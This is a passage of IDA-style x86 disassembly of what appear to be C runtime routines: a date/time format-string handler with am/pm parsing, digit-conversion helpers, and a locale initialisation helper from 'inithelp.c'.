jmp short loc_42E7C2
; ---------------------------------------------------------------------------
loc_42E7A0: ; CODE XREF: sub_42E360+410�j
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A0h]
push edx
call sub_42EB30
add esp, 14h
loc_42E7C2: ; CODE XREF: sub_42E360+43E�j
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E7C7: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8F1�o
mov dword_492410, 0
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+0A8h]
push edx
call sub_42EB30
add esp, 14h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E7F8: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E921�o
mov eax, dword_492410
mov dword_492414, eax
mov ecx, [ebp+arg_4]
mov eax, [ecx+14h]
cdq
mov ecx, 64h
idiv ecx
mov [ebp+var_4], edx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 2
mov ecx, [ebp+var_4]
push ecx
call sub_42E9D0
add esp, 10h
jmp loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E82E: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8F5�o
mov edx, dword_492410
mov dword_492414, edx
mov eax, [ebp+arg_4]
mov eax, [eax+14h]
cdq
mov ecx, 64h
idiv ecx
mov ecx, eax
add ecx, 13h
imul ecx, 64h
mov edx, [ebp+arg_4]
mov eax, [edx+14h]
cdq
mov esi, 64h
idiv esi
add ecx, edx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 4
mov edx, [ebp+var_4]
push edx
call sub_42E9D0
add esp, 10h
jmp short loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E87B: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:0042E8F9�o
call sub_42BA60
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
xor eax, eax
cmp dword ptr [edx+20h], 0
setnz al
mov ecx, off_443F54[eax*4]
push ecx
call sub_42E980
add esp, 0Ch
jmp short loc_42E8C8
; ---------------------------------------------------------------------------
loc_42E8A6: ; CODE XREF: sub_42E360+2C�j
; DATA XREF: .text:off_42E8CD�o
mov edx, [ebp+arg_8]
mov eax, [edx]
mov byte ptr [eax], 25h
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_42E8C8: ; CODE XREF: sub_42E360+1B�j
; sub_42E360+2C�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_42E360 endp
; ---------------------------------------------------------------------------
off_42E8CD dd offset loc_42E8A6 ; DATA XREF: sub_42E360+2C�r
dd offset loc_42E3B5
dd offset loc_42E3FB
dd offset loc_42E548
dd offset loc_42E570
dd offset loc_42E60F
dd offset loc_42E67B
dd offset loc_42E6A4
dd offset loc_42E6E5
dd offset loc_42E7C7
dd offset loc_42E82E
dd offset loc_42E87B
dd offset loc_42E393
dd offset loc_42E3D8
dd offset loc_42E41E
dd offset loc_42E51E
dd offset loc_42E5B5
dd offset loc_42E5E2
dd offset loc_42E637
dd offset loc_42E6BB
dd offset loc_42E769
dd offset loc_42E7F8
dd offset loc_42E8C8
byte_42E929 db 0 ; DATA XREF: sub_42E360+26�r
dw 1616h
dd 6 dup(16161616h), 16020116h, 16161616h, 16160403h, 16160516h
dd 6161616h, 8160716h, 160B0A09h, 16161616h, 0E0D0C16h
dd 1616160Fh, 16101616h, 16161116h, 16161612h, 13161616h
dd 0CC0B1514h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E980 proc near ; CODE XREF: sub_42E360+48�p
; sub_42E360+6B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
loc_42E983: ; CODE XREF: sub_42E980+44�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax], 0
jz short loc_42E9C6
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42E9C6
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_4]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_4]
mov [eax], edx
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
jmp short loc_42E983
; ---------------------------------------------------------------------------
loc_42E9C6: ; CODE XREF: sub_42E980+9�j
; sub_42E980+13�j
pop ebp
retn
sub_42E980 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E9D0 proc near ; CODE XREF: sub_42E360+1DB�p
; sub_42E360+203�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
cmp dword_492414, 0
jz short loc_42E9FA
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42EA80
add esp, 0Ch
jmp short loc_42EA79
; ---------------------------------------------------------------------------
loc_42E9FA: ; CODE XREF: sub_42E9D0+12�j
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_4]
cmp ecx, [eax]
jnb short loc_42EA70
mov edx, [ebp+arg_4]
sub edx, 1
mov [ebp+arg_4], edx
jmp short loc_42EA18
; ---------------------------------------------------------------------------
loc_42EA0F: ; CODE XREF: sub_42E9D0+82�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
loc_42EA18: ; CODE XREF: sub_42E9D0+3D�j
mov ecx, [ebp+arg_4]
add ecx, 1
test ecx, ecx
jz short loc_42EA54
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
add edx, 30h
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov eax, [ebp+arg_4]
mov [ecx+eax], dl
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+arg_0], eax
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_42EA0F
; ---------------------------------------------------------------------------
loc_42EA54: ; CODE XREF: sub_42E9D0+50�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, [ebp+var_4]
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, [ebp+var_4]
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp short loc_42EA79
; ---------------------------------------------------------------------------
loc_42EA70: ; CODE XREF: sub_42E9D0+32�j
mov eax, [ebp+arg_C]
mov dword ptr [eax], 0
loc_42EA79: ; CODE XREF: sub_42E9D0+28�j
; sub_42E9D0+9E�j
mov esp, ebp
pop ebp
retn
sub_42E9D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EA80 proc near ; CODE XREF: sub_42E9D0+20�p
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_4], ecx
mov edx, [ebp+arg_8]
cmp dword ptr [edx], 1
jbe short loc_42EADB
loc_42EA96: ; CODE XREF: sub_42EA80+59�j
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
add edx, 30h
mov eax, [ebp+var_4]
mov [eax], dl
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+arg_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+arg_0]
cdq
mov ecx, 0Ah
idiv ecx
mov [ebp+arg_0], eax
cmp [ebp+arg_0], 0
jle short loc_42EADB
mov edx, [ebp+arg_8]
cmp dword ptr [edx], 1
ja short loc_42EA96
loc_42EADB: ; CODE XREF: sub_42EA80+14�j
; sub_42EA80+51�j
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
loc_42EAF4: ; CODE XREF: sub_42EA80+A6�j
mov edx, [ebp+var_4]
mov al, [edx]
mov [ebp+var_C], al
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_8]
mov al, [ebp+var_C]
mov [edx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
cmp edx, [ebp+var_4]
jb short loc_42EAF4
mov esp, ebp
pop ebp
retn
sub_42EA80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EB30 proc near ; CODE XREF: sub_42E360+EB�p
; sub_42E360+13C�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 30h
loc_42EB36: ; CODE XREF: sub_42EB30+2EA�j
; sub_42EB30:loc_42EEFB�j ...
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_42EFAC
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0
jz loc_42EFAC
mov [ebp+var_8], 0
mov dword_492414, 0
mov [ebp+var_C], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_42EB76
; ---------------------------------------------------------------------------
loc_42EB6D: ; CODE XREF: sub_42EB30+5F�j
mov ecx, [ebp+var_C]
add ecx, 1
mov [ebp+var_C], ecx
loc_42EB76: ; CODE XREF: sub_42EB30+3B�j
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
cmp eax, edx
jnz short loc_42EB91
jmp short loc_42EB6D
; ---------------------------------------------------------------------------
loc_42EB91: ; CODE XREF: sub_42EB30+5D�j
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
mov [ebp+var_14], ecx
mov edx, [ebp+var_14]
sub edx, 27h
mov [ebp+var_14], edx
cmp [ebp+var_14], 52h
ja loc_42EF00
mov ecx, [ebp+var_14]
xor eax, eax
mov al, ds:byte_42EFDC[ecx]
jmp ds:off_42EFB0[eax*4]
loc_42EBC8: ; DATA XREF: .text:0042EFBC�o
mov edx, [ebp+var_C]
mov [ebp+var_18], edx
mov eax, [ebp+var_18]
sub eax, 1
mov [ebp+var_18], eax
cmp [ebp+var_18], 3
ja short loc_42EC01
mov ecx, [ebp+var_18]
jmp ds:off_42F02F[ecx*4]
loc_42EBE7: ; DATA XREF: .text:off_42F02F�o
mov dword_492414, 1
loc_42EBF1: ; CODE XREF: sub_42EB30+B0�j
; DATA XREF: .text:0042F033�o
mov [ebp+var_8], 6Dh
jmp short loc_42EC01
; ---------------------------------------------------------------------------
loc_42EBF7: ; CODE XREF: sub_42EB30+B0�j
; DATA XREF: .text:0042F037�o
mov [ebp+var_8], 62h
jmp short loc_42EC01
; ---------------------------------------------------------------------------
loc_42EBFD: ; CODE XREF: sub_42EB30+B0�j
; DATA XREF: .text:0042F03B�o
mov [ebp+var_8], 42h
loc_42EC01: ; CODE XREF: sub_42EB30+AB�j
; sub_42EB30+C5�j ...
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42EC06: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFC0�o
mov edx, [ebp+var_C]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 3
ja short loc_42EC3F
mov ecx, [ebp+var_1C]
jmp ds:off_42F03F[ecx*4]
loc_42EC25: ; CODE XREF: sub_42EB30+B0�j
; DATA XREF: .text:off_42F03F�o
mov dword_492414, 1
loc_42EC2F: ; CODE XREF: sub_42EB30+B0�j
; sub_42EB30+EE�j
; DATA XREF: ...
mov [ebp+var_8], 64h
jmp short loc_42EC3F
; ---------------------------------------------------------------------------
loc_42EC35: ; CODE XREF: sub_42EB30+B0�j
; sub_42EB30+EE�j
; DATA XREF: ...
mov [ebp+var_8], 61h
jmp short loc_42EC3F
; ---------------------------------------------------------------------------
loc_42EC3B: ; CODE XREF: sub_42EB30+B0�j
; sub_42EB30+EE�j
; DATA XREF: ...
mov [ebp+var_8], 41h
loc_42EC3F: ; CODE XREF: sub_42EB30+E9�j
; sub_42EB30+103�j ...
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42EC44: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFD4�o
mov edx, [ebp+var_C]
mov [ebp+var_20], edx
cmp [ebp+var_20], 2
jz short loc_42EC58
cmp [ebp+var_20], 4
jz short loc_42EC5E
jmp short loc_42EC62
; ---------------------------------------------------------------------------
loc_42EC58: ; CODE XREF: sub_42EB30+11E�j
mov [ebp+var_8], 79h
jmp short loc_42EC62
; ---------------------------------------------------------------------------
loc_42EC5E: ; CODE XREF: sub_42EB30+124�j
mov [ebp+var_8], 59h
loc_42EC62: ; CODE XREF: sub_42EB30+126�j
; sub_42EB30+12C�j
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42EC67: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFC4�o
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
cmp [ebp+var_24], 1
jz short loc_42EC7B
cmp [ebp+var_24], 2
jz short loc_42EC85
jmp short loc_42EC89
; ---------------------------------------------------------------------------
loc_42EC7B: ; CODE XREF: sub_42EB30+141�j
mov dword_492414, 1
loc_42EC85: ; CODE XREF: sub_42EB30+147�j
mov [ebp+var_8], 49h
loc_42EC89: ; CODE XREF: sub_42EB30+149�j
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42EC8E: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFB8�o
mov ecx, [ebp+var_C]
mov [ebp+var_28], ecx
cmp [ebp+var_28], 1
jz short loc_42ECA2
cmp [ebp+var_28], 2
jz short loc_42ECAC
jmp short loc_42ECB0
; ---------------------------------------------------------------------------
loc_42ECA2: ; CODE XREF: sub_42EB30+168�j
mov dword_492414, 1
loc_42ECAC: ; CODE XREF: sub_42EB30+16E�j
mov [ebp+var_8], 48h
loc_42ECB0: ; CODE XREF: sub_42EB30+170�j
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42ECB5: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFC8�o
mov edx, [ebp+var_C]
mov [ebp+var_2C], edx
cmp [ebp+var_2C], 1
jz short loc_42ECC9
cmp [ebp+var_2C], 2
jz short loc_42ECD3
jmp short loc_42ECD7
; ---------------------------------------------------------------------------
loc_42ECC9: ; CODE XREF: sub_42EB30+18F�j
mov dword_492414, 1
loc_42ECD3: ; CODE XREF: sub_42EB30+195�j
mov [ebp+var_8], 4Dh
loc_42ECD7: ; CODE XREF: sub_42EB30+197�j
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42ECDC: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFCC�o
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
cmp [ebp+var_30], 1
jz short loc_42ECF0
cmp [ebp+var_30], 2
jz short loc_42ECFA
jmp short loc_42ECFE
; ---------------------------------------------------------------------------
loc_42ECF0: ; CODE XREF: sub_42EB30+1B6�j
mov dword_492414, 1
loc_42ECFA: ; CODE XREF: sub_42EB30+1BC�j
mov [ebp+var_8], 53h
loc_42ECFE: ; CODE XREF: sub_42EB30+1BE�j
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42ED03: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFB4�o
push offset aAmPm ; "am/pm"
mov ecx, [ebp+arg_0]
push ecx
call sub_42F560
add esp, 8
test eax, eax
jnz short loc_42ED23
mov edx, [ebp+arg_0]
add edx, 5
mov [ebp+var_4], edx
jmp short loc_42ED41
; ---------------------------------------------------------------------------
loc_42ED23: ; CODE XREF: sub_42EB30+1E6�j
push offset aAP ; "a/p"
mov eax, [ebp+arg_0]
push eax
call sub_42F560
add esp, 8
test eax, eax
jnz short loc_42ED41
mov ecx, [ebp+arg_0]
add ecx, 3
mov [ebp+var_4], ecx
loc_42ED41: ; CODE XREF: sub_42EB30+1F1�j
; sub_42EB30+206�j
mov [ebp+var_8], 70h
jmp loc_42EF00
; ---------------------------------------------------------------------------
loc_42ED4A: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:0042EFD0�o
mov edx, [ebp+arg_4]
cmp dword ptr [edx+8], 0Bh
jg short loc_42ED61
mov eax, [ebp+arg_10]
mov ecx, [eax+98h]
mov [ebp+var_10], ecx
jmp short loc_42ED6D
; ---------------------------------------------------------------------------
loc_42ED61: ; CODE XREF: sub_42EB30+221�j
mov edx, [ebp+arg_10]
mov eax, [edx+9Ch]
mov [ebp+var_10], eax
loc_42ED6D: ; CODE XREF: sub_42EB30+22F�j
; sub_42EB30+2DF�j
cmp [ebp+var_C], 0
jle loc_42EE14
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jbe loc_42EE14
mov edx, [ebp+var_10]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_42EDD7
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 1
jbe short loc_42EDD7
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+var_10]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+var_10]
add edx, 1
mov [ebp+var_10], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
loc_42EDD7: ; CODE XREF: sub_42EB30+26E�j
; sub_42EB30+276�j
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+var_10]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
jmp loc_42ED6D
; ---------------------------------------------------------------------------
loc_42EE14: ; CODE XREF: sub_42EB30+241�j
; sub_42EB30+24D�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
jmp loc_42EB36
; ---------------------------------------------------------------------------
loc_42EE1F: ; CODE XREF: sub_42EB30+91�j
; DATA XREF: .text:off_42EFB0�o
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jz loc_42EEF2
mov edx, [ebp+arg_0]
add edx, [ebp+var_C]
mov [ebp+arg_0], edx
loc_42EE36: ; CODE XREF: sub_42EB30+3BB�j
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz loc_42EEF0
mov edx, [ebp+arg_C]
cmp dword ptr [edx], 0
jz loc_42EEF0
mov eax, [ebp+arg_0]
movsx ecx, byte ptr [eax]
cmp ecx, 27h
jnz short loc_42EE69
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp loc_42EEF0
; ---------------------------------------------------------------------------
loc_42EE69: ; CODE XREF: sub_42EB30+329�j
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cl, [eax]
mov edx, off_442D4C
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 8000h
test eax, eax
jz short loc_42EEBC
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 1
jbe short loc_42EEBC
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [ebp+arg_0]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_42EEBC: ; CODE XREF: sub_42EB30+353�j
; sub_42EB30+35B�j
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [edx], cl
mov edx, [ebp+arg_8]
mov eax, [edx]
add eax, 1
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
mov eax, [ebp+arg_C]
mov ecx, [eax]
sub ecx, 1
mov edx, [ebp+arg_C]
mov [edx], ecx
jmp loc_42EE36
; ---------------------------------------------------------------------------
loc_42EEF0: ; CODE XREF: sub_42EB30+30E�j
; sub_42EB30+31A�j ...
jmp short loc_42EEFB
; ---------------------------------------------------------------------------
loc_42EEF2: ; CODE XREF: sub_42EB30+2F7�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_C]
mov [ebp+arg_0], eax
loc_42EEFB: ; CODE XREF: sub_42EB30:loc_42EEF0�j
jmp loc_42EB36
; ---------------------------------------------------------------------------
loc_42EF00: ; CODE XREF: sub_42EB30+80�j
; sub_42EB30+91�j ...
movsx ecx, [ebp+var_8]
test ecx, ecx
jz short loc_42EF2C
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov al, [ebp+var_8]
push eax
call sub_42E360
add esp, 14h
mov ecx, [ebp+var_4]
mov [ebp+arg_0], ecx
jmp short loc_42EFA7
; ---------------------------------------------------------------------------
loc_42EF2C: ; CODE XREF: sub_42EB30+3D6�j
mov edx, [ebp+arg_0]
xor eax, eax
mov al, [edx]
mov ecx, off_442D4C
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_42EF78
mov eax, [ebp+arg_8]
mov ecx, [eax]
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ecx], al
mov ecx, [ebp+arg_8]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_8]
mov [eax], edx
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
mov edx, [ebp+arg_C]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+arg_C]
mov [ecx], eax
loc_42EF78: ; CODE XREF: sub_42EB30+417�j
mov edx, [ebp+arg_8]
mov eax, [edx]
mov ecx, [ebp+arg_0]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+arg_8]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx], ecx
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_C]
mov edx, [ecx]
sub edx, 1
mov eax, [ebp+arg_C]
mov [eax], edx
loc_42EFA7: ; CODE XREF: sub_42EB30+3FA�j
jmp loc_42EB36
; ---------------------------------------------------------------------------
loc_42EFAC: ; CODE XREF: sub_42EB30+E�j
; sub_42EB30+1A�j
mov esp, ebp
pop ebp
retn
sub_42EB30 endp
; ---------------------------------------------------------------------------
off_42EFB0 dd offset loc_42EE1F ; DATA XREF: sub_42EB30+91�r
dd offset loc_42ED03
dd offset loc_42EC8E
dd offset loc_42EBC8
dd offset loc_42EC06
dd offset loc_42EC67
dd offset loc_42ECB5
dd offset loc_42ECDC
dd offset loc_42ED4A
dd offset loc_42EC44
dd offset loc_42EF00
byte_42EFDC db 0 ; DATA XREF: sub_42EB30+8B�r
db 3 dup(0Ah)
dd 5 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A0A0Ah, 0A0A020Ah, 0A030A0Ah
dd 4 dup(0A0A0A0Ah), 0A010A0Ah, 0A0A040Ah, 0A0A050Ah, 0A060A0Ah
dd 0A0A0A0Ah, 0A0A0807h
db 2 dup(0Ah), 9
off_42F02F dd offset loc_42EBE7 ; DATA XREF: sub_42EB30+B0�r
dd offset loc_42EBF1
dd offset loc_42EBF7
dd offset loc_42EBFD
off_42F03F dd offset loc_42EC25 ; DATA XREF: sub_42EB30+EE�r
dd offset loc_42EC2F
dd offset loc_42EC35
dd offset loc_42EC3B
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F050 proc near ; CODE XREF: sub_429860+41�p
; sub_429860+60�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0A8h
cmp [ebp+arg_0], 1
jnz loc_42F1B9
mov eax, [ebp+arg_C]
mov [ebp+var_90], eax
lea ecx, [ebp+var_8C]
mov [ebp+var_C], ecx
mov [ebp+var_4], 0
mov [ebp+var_94], 80h
push 0
mov edx, [ebp+var_94]
push edx
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
call sub_430040
add esp, 14h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz loc_42F13F
call ds:dword_4942F0
cmp eax, 7Ah
jz short loc_42F0C0
jmp loc_42F19D
; ---------------------------------------------------------------------------
loc_42F0C0: ; CODE XREF: sub_42F050+69�j
push 0
push 0
push 0
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
call sub_430040
add esp, 14h
mov [ebp+var_94], eax
cmp [ebp+var_94], 0
jnz short loc_42F0EA
jmp loc_42F19D
; ---------------------------------------------------------------------------
loc_42F0EA: ; CODE XREF: sub_42F050+93�j
push 58h
push offset aInithelp_c ; "inithelp.c"
push 2
mov edx, [ebp+var_94]
push edx
call sub_416A30
add esp, 10h
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42F110
jmp loc_42F19D
; ---------------------------------------------------------------------------
loc_42F110: ; CODE XREF: sub_42F050+B9�j
mov [ebp+var_4], 1
push 0
mov eax, [ebp+var_94]
push eax
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_430040
add esp, 14h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_42F13F
jmp short loc_42F19D
; ---------------------------------------------------------------------------
loc_42F13F: ; CODE XREF: sub_42F050+5A�j
; sub_42F050+EB�j
push 63h
push offset aInithelp_c ; "inithelp.c"
push 2
mov ecx, [ebp+var_8]
push ecx
call sub_416A30
add esp, 10h
mov edx, [ebp+var_90]
mov [edx], eax
mov eax, [ebp+var_90]
cmp dword ptr [eax], 0
jnz short loc_42F169
jmp short loc_42F19D
; ---------------------------------------------------------------------------
loc_42F169: ; CODE XREF: sub_42F050+115�j
mov ecx, [ebp+var_8]
push ecx
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_90]
mov ecx, [eax]
push ecx
call sub_4191A0
add esp, 0Ch
cmp [ebp+var_4], 0
jz short loc_42F196
push 2
mov edx, [ebp+var_C]
push edx
call sub_4174C0
add esp, 8
loc_42F196: ; CODE XREF: sub_42F050+136�j
xor eax, eax
jmp loc_42F2D6
; ---------------------------------------------------------------------------
loc_42F19D: ; CODE XREF: sub_42F050+6B�j
; sub_42F050+95�j ...
cmp [ebp+var_4], 0
jz short loc_42F1B1
push 2
mov eax, [ebp+var_C]
push eax
call sub_4174C0
add esp, 8
loc_42F1B1: ; CODE XREF: sub_42F050+151�j
or eax, 0FFFFFFFFh
jmp loc_42F2D6
; ---------------------------------------------------------------------------
loc_42F1B9: ; CODE XREF: sub_42F050+D�j
cmp [ebp+arg_0], 0
jnz loc_42F2D3
mov [ebp+var_A4], 4
mov ecx, [ebp+arg_C]
